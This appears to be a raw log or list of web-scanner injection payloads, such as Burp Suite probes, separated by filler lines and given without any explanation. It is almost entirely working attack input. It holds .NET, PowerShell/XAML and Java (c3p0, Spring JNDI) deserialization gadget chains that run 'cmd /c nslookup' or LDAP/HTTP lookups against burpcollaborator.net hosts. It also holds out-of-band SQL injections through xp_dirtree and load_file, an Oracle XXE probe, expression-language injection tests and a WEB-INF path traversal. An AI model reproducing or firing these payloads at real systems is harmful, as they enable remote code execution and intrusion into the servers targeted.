jE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==
AAAA
AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAMsBL2MgbnNsb29rdXAgdm5tajI4cjAxYWY5ZzhoMHdpdWFla3lqZGFqMjdyLmJ1cnBjb2xsYWJvcmF0b3IubmV0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==
AAAA
BBBBB
AAAA
<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/>Startcmd/c nslookup z00nfc44eesdtcu49m7erobnqew5ku.burpcollaborator.net
AAAA
<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/>Startcmd/c nslookup 402sfh49ejsithu99r7jrtbsqjw9ky.burpcollaborator.net
AAAA
BBBBB
AAAA
(select load_file('\\\\b7jeta0rhzkwdcviyyrclb7ycpiq6gu7wvnlacy1.burpcollaborator.net\\chq'))
AAAA
BBBBB');declare @q varchar(99);set @q='\\ra5uwq37kfncgsyy1eusoraef5l69wxnqbh14ssh.burpcollab'+'orator.net\xek'; exec master.dbo.xp_dirtree @q;--
AAAA
gcom.mchange.v2.c3p0.WrapperConnectionPoolDataSource+userOverridesAsString�HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064672656464797400c8687474703a2f2f6175386679657030676432623863757967706a6c757473776c6e726466322e62757270636f6c6c61626f7261746f722e6e65742f202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020740003466f6f;
AAAA
BBBBB);declare @q varchar(99);set @q='\\q1stnpu6beeb7rpxsdlrfq1d64c50vomga70urig.burpcollab'+'orator.net\jbj'; exec master.dbo.xp_dirtree @q;--
AAAA
ChMXRnJlZGR5RGVzZXIA
AAAA
BBBBB';declare @q varchar(99);set @q='\\fo7iaehvy310ugcmf28g2fo2ttzunkbb2ztpgg45.burpcollab'+'orator.net\izr'; exec master.dbo.xp_dirtree @q;--
AAAA
FreddyDeser
AAAA
BBBBB;declare @q varchar(99);set @q='\\nqhqcmj30b38woeuhaao4nqav112psdj37uxho5d.burpcollab'+'orator.net\bmq'; exec master.dbo.xp_dirtree @q;--
AAAA
EABAb3JnLnNwcmluZ2ZyYW1ld29yay5iZWFucy5mYWN0b3J5LmNvbmZpZy5Qcm9wZXJ0eVBhdGhGYWN0b3J5QmVhbgAOdGFyZ2V0QmVhbk5hbWUCAMhsZGFwOi8vZXZkc216aXhoNnE2b2F0eGE5Z3V2aWR0amtwZGQyLmJ1cnBjb2xsYWJvcmF0b3IubmV0LyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAAMcHJvcGVydHlQYXRoAgADZm9vAAtiZWFuRmFjdG9yeRAANm9yZy5zcHJpbmdmcmFtZXdvcmsuam5kaS5zdXBwb3J0LlNpbXBsZUpuZGlCZWFuRmFjdG9yeQASc2hhcmVhYmxlUmVzb3VyY2VzEAAhZmxleC5tZXNzYWdpbmcuaW8uQXJyYXlDb2xsZWN0aW9uAAZzb3VyY2UKAAAAAQIAyGxkYXA6Ly9ldmRzbXppeGg2cTZvYXR4YTlndXZpZHRqa3BkZDIuYnVycGNvbGxhYm9yYXRvci5uZXQvICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgAAAJAAAJAAAJ
AAAA
BBBBB
AAAA
@org.springframework.beans.factory.config.PropertyPathFactoryBeantargetBeanName�ldap://owo2n9j7igrgpku7bjh4wse3kuqmeb.burpcollaborator.net/ propertyPathfoobeanFactory6org.springframework.jndi.support.SimpleJndiBeanFactoryshareableResources!flex.messaging.io.ArrayCollectionsource �ldap://owo2n9j7igrgpku7bjh4wse3kuqmeb.burpcollaborator.net/
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB'||(select extractvalue(xmltype('%taqzb;]>'),'/l') from dual)||'
AAAA
(select extractvalue(xmltype('%taqzb;]>'),'/l') from dual)
AAAA
EAAzY29tLm1jaGFuZ2UudjIuYzNwMC5XcmFwcGVyQ29ubmVjdGlvblBvb2xEYXRhU291cmNlABV1c2VyT3ZlcnJpZGVzQXNTdHJpbmcCBc9IZXhBc2NpaVNlcmlhbGl6ZWRNYXA6YWNlZDAwMDU3MzcyMDAzZDYzNmY2ZDJlNmQ2MzY4NjE2ZTY3NjUyZTc2MzIyZTZlNjE2ZDY5NmU2NzJlNTI2NTY2NjU3MjY1NmU2MzY1NDk2ZTY0Njk3MjY1NjM3NDZmNzIyNDUyNjU2NjY1NzI2NTZlNjM2NTUzNjU3MjY5NjE2YzY5N2E2NTY0NjIxOTg1ZDBkMTJhYzIxMzAyMDAwNDRjMDAwYjYzNmY2ZTc0NjU3ODc0NGU2MTZkNjU3NDAwMTM0YzZhNjE3NjYxNzgyZjZlNjE2ZDY5NmU2NzJmNGU2MTZkNjUzYjRjMDAwMzY1NmU3Njc0MDAxNTRjNmE2MTc2NjEyZjc1NzQ2OTZjMmY0ODYxNzM2ODc0NjE2MjZjNjUzYjRjMDAwNDZlNjE2ZDY1NzEwMDdlMDAwMTRjMDAwOTcyNjU2NjY1NzI2NTZlNjM2NTc0MDAxODRjNmE2MTc2NjE3ODJmNmU2MTZkNjk2ZTY3MmY1MjY1NjY2NTcyNjU2ZTYzNjUzYjc4NzA3MDcwNzA3MzcyMDAxNjZhNjE3NjYxNzgyZTZlNjE2ZDY5NmU2NzJlNTI2NTY2NjU3MjY1NmU2MzY1ZThjNjllYTJhOGU5OGQwOTAyMDAwNDRjMDAwNTYxNjQ2NDcyNzM3NDAwMTI0YzZhNjE3NjYxMmY3NTc0Njk2YzJmNTY2NTYzNzQ2ZjcyM2I0YzAwMGM2MzZjNjE3MzczNDY2MTYzNzQ2ZjcyNzk3NDAwMTI0YzZhNjE3NjYxMmY2YzYxNmU2NzJmNTM3NDcyNjk2ZTY3M2I0YzAwMTQ2MzZjNjE3MzczNDY2MTYzNzQ2ZjcyNzk0YzZmNjM2MTc0Njk2ZjZlNzEwMDdlMDAwNzRjMDAwOTYzNmM2MTczNzM0ZTYxNmQ2NTcxMDA3ZTAwMDc3ODcwNzM3MjAwMTA2YTYxNzY2MTJlNzU3NDY5NmMyZTU2NjU2Mzc0NmY3MmQ5OTc3ZDViODAzYmFmMDEwMzAwMDM0OTAwMTE2MzYxNzA2MTYzNjk3NDc5NDk2ZTYzNzI2NTZkNjU2ZTc0NDkwMDBjNjU2YzY1NmQ2NTZlNzQ0MzZmNzU2ZTc0NWIwMDBiNjU2YzY1NmQ2NTZlNzQ0NDYxNzQ2MTc0MDAxMzViNGM2YTYxNzY2MTJmNmM2MTZlNjcyZjRmNjI2YTY1NjM3NDNiNzg3MDAwMDAwMDAwMDAwMDAwMDA3NTcyMDAxMzViNGM2YTYxNzY2MTJlNmM2MTZlNjcyZTRmNjI2YTY1NjM3NDNiOTBjZTU4OWYxMDczMjk2YzAyMDAwMDc4NzAwMDAwMDAwYTcwNzA3MDcwNzA3MDcwNzA3MDcwNzg3NDAwMDY0NjcyNjU2NDY0Nzk3NDAwYzg2ODc0NzQ3MDNhMmYyZjc4NmY3MDYyNjY2OTYyNjc2MTcwNmE3MDY4NzQ2ZDY3MzM3MzM5NjQ2ZjMxMzY2MzYzMzM2OTc1MzY2YTJlNjI3NTcyNzA2MzZmNmM2YzYxNjI2ZjcyNjE3NDZmNzIyZTZlNjU3NDJmMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwMjAyMDIwNzQwMDAzNDY2ZjZmOwAACQ==
AAAA
3com.mchange.v2.c3p0.WrapperConnectionPoolDataSourceuserOverridesAsString�HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064672656464797400c8687474703a2f2f7530763872666e646d6d766d7471796466706c61307969396f30757169662e62757270636f6c6c61626f7261746f722e6e65742f202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020740003466f6f;
AAAA
BBBBB
AAAA
EAALRnJlZGR5RGVzZXI=
AAAA
FreddyDeser
AAAA
BBBBB
AAAA
Parse<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><System:String>cmd</System:String><System:String>/c nslookup ne5r59w3cz9p3twcplu9aa89f0lr9g.burpcollaborator.net</System:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
Parse<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start"><ObjectDataProvider.MethodParameters><System:String>cmd</System:String><System:String>/c nslookup c6jgxyos4o1evio1hamy2z0y7pdf14.burpcollaborator.net</System:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>
AAAA
{"$type":"
#{817*602}
BBBBB
AAAA
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Management.Infrastructure.CimInstance#System.Management.Automation/RunspaceInvoke5</T>
<T>Microsoft.Management.Infrastructure.CimInstance#RunspaceInvoke5</T>
<T>Microsoft.Management.Infrastructure.CimInstance</T>
<T>System.Object</T>
</TN>
<ToString>RunspaceInvoke5</ToString>
<Obj RefId="1">
<TNRef RefId="0" />
<ToString>RunspaceInvoke5</ToString>
<Props>
<Nil N="PSComputerName" />
<Obj N="test1" RefId ="20" > 
<TN RefId="1" > 
<T>System.Windows.Markup.XamlReader[], PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</T>
<T>System.Array</T>
<T>System.Object</T>
</TN>
<LST>
<S N="Hash" > <ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system"><ObjectDataProvider x:Key="LaunchCalc" ObjectType = "{ x:Type Diag:Process}" MethodName = "Start" ><ObjectDataProvider.MethodParameters><System:String>cmd</System:String><System:String>/c "nslookup okcxgseifc1wgjpmx6bgkoevjmpdd2.burpcollaborator.net" </System:String></ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary></S>
</LST>
</Obj>
</Props>
<MS>
<Obj N="__ClassMetadata" RefId ="2"> 
<TN RefId="1" > 
<T>System.Collections.ArrayList</T>
<T>System.Object</T>
</TN>
<LST>
<Obj RefId="3"> 
<MS>
<S N="ClassName">RunspaceInvoke5</S>
<S N="Namespace">System.Management.Automation</S>
<Nil N="ServerName" />
<I32 N="Hash">460929192</I32>
<S N="MiXml"> <CLASS NAME="RunspaceInvoke5" ><PROPERTY NAME="test1" TYPE ="string" ></PROPERTY></CLASS></S>
</MS>
</Obj>
</LST>
</Obj>
</MS>
</Obj>
<MS>
<Ref N="__ClassMetadata" RefId ="2" />
</MS>
</Obj>
</Objs>
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
AAAA
BBBBB
${applicationScope}
BBBBB
${817*602}
BBBBB
#{applicationScope}
BBBBB
AAAA
/wEyhRMAAQAAAP////8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAywEvYyBuc2xvb2t1cCBjbjNnZjY5NmNkdmh6bjg5a3RhbzBpbng3b2RqMTguYnVycGNvbGxhYm9yYXRvci5uZXQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAYHAAAAA2NtZAQFAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAACERlbGVnYXRlB21ldGhvZDAHbWV0aG9kMQMDAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJCAAAAAkJAAAACQoAAAAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYLAAAAsAJTeXN0ZW0uRnVuY2AzW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNAAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JDwAAAAkNAAAACQ4AAAAGFAAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVAAAAPlN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBCgAAAAkAAAAGFgAAAAdDb21wYXJlCQwAAAAGGAAAAA1TeXN0ZW0uU3RyaW5nBhkAAAArSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaAAAAMlN5c3RlbS5JbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAAAAAoBEAAAAAgAAAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkMAAAACgkMAAAACRgAAAAJFgAAAAoL
AAAA
�2����� ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089�System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]CountComparerVersionItems�System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] �System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]_comparison"System.DelegateSerializationHolder �/c nslookup y8720susxzg3k9tv5fval48jsay4mt.burpcollaborator.net cmd"System.DelegateSerializationHolderDelegatemethod0method10System.DelegateSerializationHolder+DelegateEntry/System.Reflection.MemberInfoSerializationHolder/System.Reflection.MemberInfoSerializationHolder 0System.DelegateSerializationHolder+DelegateEntrytypeassemblytargettargetTypeAssemblytargetTypeName methodName delegateEntry0System.DelegateSerializationHolder+DelegateEntry�System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] Kmscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089System.Diagnostics.ProcessStart /System.Reflection.MemberInfoSerializationHolderName AssemblyName ClassName Signature Signature2 MemberTypeGenericArguments System.Type[] >System.Diagnostics.Process Start(System.String, System.String)>System.Diagnostics.Process Start(System.String, System.String) Compare System.String+Int32 Compare(System.String, System.String)2System.Int32 Compare(System.String, System.String) qSystem.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]
../WEB-INF/web.xml;x=
BBBBB
AAAA
BBBBB
AAAA
